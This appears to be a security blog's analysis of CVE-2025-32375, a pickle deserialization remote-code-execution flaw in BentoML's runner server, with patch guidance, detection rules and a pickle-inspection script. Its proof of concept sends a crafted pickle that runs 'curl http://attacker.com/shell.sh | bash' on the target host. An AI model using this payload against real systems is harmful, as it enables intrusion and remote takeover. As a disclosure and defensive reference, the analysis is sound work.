CVE Analysis - 7 min read

Critical RCE in BentoML Runner Server: Deep Dive into CVE-2025-32375

An in-depth technical analysis of CVE-2025-32375, a critical remote code execution vulnerability in BentoML's runner server, including exploitation methods, detection techniques, and patching guidance.

Introduction

Machine learning deployments face a critical threat as BentoML's runner server vulnerability (CVE-2025-32375) exposes systems to remote code execution. Attackers can exploit insecure deserialization practices to execute arbitrary commands, potentially compromising sensitive data and critical infrastructure. With a CVSS score of 9.8, immediate action is necessary.

Affected Systems and Versions

BentoML versions 1.0.0a1 through 1.4.7 are vulnerable. The issue specifically affects the runner server component, which processes serialized data without adequate validation.

Technical Information

The vulnerability originates in runner_app.py. The request handler excerpted below passes the raw HTTP request body to the _deserialize_single_param function, which deserializes that untrusted data using Python's pickle module:

async def _request_handler(request: Request) -> Response:
    # Both the header value and the body come straight from the client.
    arg_num = int(request.headers["args-number"])
    r_: bytes = await request.body()
    if arg_num == 1:
        # The raw, unvalidated body is handed to the deserializer.
        params: Params[t.Any] = _deserialize_single_param(request, r_)

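An attacker sets the args-number, Payload-Container, and Payload-Meta headers so that the handler takes this code path, and places a malicious pickle in the request body. The pickle is built from an object whose __reduce__ method returns a callable and its arguments. The unpickler invokes that callable during deserialization, which lets the attacker run arbitrary OS commands on the runner host.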
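To make the mechanism concrete, here is a minimal and deliberately harmless sketch. The Demo class is hypothetical, and operator.add stands in for the dangerous callable an attacker would choose. It shows that unpickling returns the result of calling that function rather than rebuilding the original object:

```python
import operator
import pickle


class Demo:
    def __reduce__(self):
        # Harmless stand-in for os.system: pickle records "call operator.add(40, 2)".
        return (operator.add, (40, 2))


blob = pickle.dumps(Demo())

# Loading the bytes invokes operator.add(40, 2); no Demo object is rebuilt.
result = pickle.loads(blob)
print(result)  # 42

# The stream names the callable's module and function, not the class or "__reduce__".
print(b"__reduce__" in blob, b"Demo" in blob)  # False False
```

Because the call happens inside pickle.loads itself, no validation performed after deserialization can prevent it.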

Proof of Concept

A working exploit demonstrating the vulnerability:

import requests
import pickle

headers = {
    "args-number": "1",
    "Payload-Container": "NdarrayContainer",
    "Payload-Meta": '{"format": "default"}',
}

class Exploit:
    def __reduce__(self):
        return (__import__('os').system, ('curl http://attacker.com/shell.sh | bash',))

response = requests.post("http://target:8888", headers=headers, data=pickle.dumps(Exploit()))

This payload downloads a script from an attacker-controlled server and pipes it to bash. What happens next depends on the script; establishing a reverse shell is a typical choice.

Patch Information

The vulnerability is fixed in BentoML version 1.4.8. Organizations should immediately upgrade to 1.4.8 or later:

pip install --upgrade "bentoml>=1.4.8"

The patch replaces pickle serialization with JSON, eliminating the insecure deserialization vector.
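To audit an environment, a short script can compare the installed version against the affected range stated above (1.0.0a1 through 1.4.7). This is a minimal sketch: the function names are hypothetical, and the version parsing is a simplification that looks only at the numeric release segment, so any pre-release suffix is ignored.

```python
import re
from importlib import metadata

FIRST_AFFECTED = (1, 0, 0)  # 1.0.0a1 shares this release segment
FIRST_FIXED = (1, 4, 8)


def release_tuple(version):
    """Extract the numeric release segment, e.g. '1.0.0a1' -> (1, 0, 0)."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part or 0) for part in match.groups())


def is_vulnerable(version):
    """True if the version falls in the affected range from the advisory text."""
    return FIRST_AFFECTED <= release_tuple(version) < FIRST_FIXED


def installed_bentoml_is_vulnerable():
    """Check the local install; returns None when BentoML is not installed."""
    try:
        return is_vulnerable(metadata.version("bentoml"))
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    print(installed_bentoml_is_vulnerable())
```

Running the script in each deployment's virtual environment or container image gives a quick inventory of hosts that still need the upgrade.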

Detection Methods

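Suricata rule for detecting exploitation attempts. The rule watches traffic arriving at the runner port on the protected network; replace $EXTERNAL_NET with any if attacks may also originate from inside. The Payload-Meta match uses hex notation for the quote and colon characters and mirrors the exact JSON spacing sent by the proof of concept, so a request serialized with different whitespace would evade that match. The sid is a placeholder from the local range and should be adjusted to fit your ruleset:

alert http $EXTERNAL_NET any -> $HOME_NET 8888 ( \
    msg:"BentoML RCE Exploit Attempt"; \
    flow:established,to_server; \
    http.method; content:"POST"; \
    http.header; content:"Payload-Container"; nocase; content:"NdarrayContainer"; \
    http.header; content:"Payload-Meta"; nocase; content:"{|22|format|22 3A 20 22|default|22|}"; \
    threshold:type limit, track by_src, count 1, seconds 60; \
    reference:cve,2025-32375; \
    sid:1000001; rev:1; \
)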
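The same indicators can be applied to request records that have already been parsed, for example from proxy or gateway logs. The sketch below is an assumption-laden illustration, not part of any BentoML or Suricata tooling: the function name, the record shape, and the idea of an allowlist of trusted source networks are all hypothetical. Parsing Payload-Meta as JSON makes the check independent of whitespace.

```python
import ipaddress
import json


def is_suspicious_runner_request(method, headers, source_ip, trusted_networks):
    """Return True for a PoC-shaped runner request from an untrusted source."""
    if method.upper() != "POST":
        return False
    # HTTP header names are case-insensitive, so normalize them first.
    lowered = {name.lower(): value for name, value in headers.items()}
    if lowered.get("payload-container") != "NdarrayContainer":
        return False
    try:
        # Parsing the JSON tolerates any spacing between keys and values.
        meta = json.loads(lowered.get("payload-meta", ""))
    except ValueError:
        return False
    if not isinstance(meta, dict) or meta.get("format") != "default":
        return False
    # Requests from the trusted networks (hypothetical allowlist) are not flagged.
    source = ipaddress.ip_address(source_ip)
    return not any(source in ipaddress.ip_network(net) for net in trusted_networks)
```

Legitimate traffic to a runner carries the same headers, so the source address is what separates expected requests from suspicious ones in this sketch.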

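YARA rule for malicious pickle payloads. A pickle stream does not contain the text "__reduce__" or "os.system"; it stores the module and attribute name of the callable as separate strings (os.system is recorded as "posix" and "system" on Linux). The rule therefore matches those pairs and checks for the 0x80 byte that begins protocol 2 and later pickles. It is a heuristic that does not cover Windows targets or other dangerous callables:

rule bentoml_rce_pickle {
    meta:
        description = "Detects pickle payloads for BentoML RCE"
    strings:
        $posix = "posix"
        $system = "system"
        $subprocess = "subprocess"
        $popen = "Popen"
    condition:
        uint8(0) == 0x80 and
        (($posix and $system) or ($subprocess and $popen)) and
        filesize < 512KB
}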
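String matching can be complemented by inspecting a pickle's opcodes without ever loading it. The following sketch uses the standard library's pickletools.genops to list the callables a stream would import. The function names and the SUSPICIOUS set are illustrative assumptions, and the handling of STACK_GLOBAL is a heuristic that takes the two most recent string arguments, so a payload that references memoized strings could evade it.

```python
import pickletools

# Illustrative, non-exhaustive set of (module, name) pairs worth flagging.
SUSPICIOUS = {
    ("os", "system"), ("posix", "system"), ("nt", "system"),
    ("subprocess", "Popen"), ("builtins", "eval"), ("builtins", "exec"),
}


def imported_globals(data):
    """List (module, name) pairs referenced by a pickle, without executing it."""
    found = []
    strings = []  # string arguments seen so far, used for STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Protocols 0-3 carry "module name" as one space-separated argument.
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Protocol 4+ pushes module and name as the two preceding strings.
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


def looks_malicious(data):
    """True if the pickle references any callable in the SUSPICIOUS set."""
    return any(pair in SUSPICIOUS for pair in imported_globals(data))
```

For example, looks_malicious(pickle.dumps(os.system)) returns True, while pickling a plain list or dict yields no imported globals at all. Note that pickletools.genops raises an exception on input that is not a well-formed pickle, so callers should treat parse failures as their own signal.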

Vendor Security History

BentoML previously addressed similar critical vulnerabilities, notably CVE-2025-27520, also involving insecure deserialization. Although patches were promptly issued, repeated similar vulnerabilities indicate potential gaps in security auditing.

Immediate action and thorough remediation are essential to protect against exploitation of this critical vulnerability.
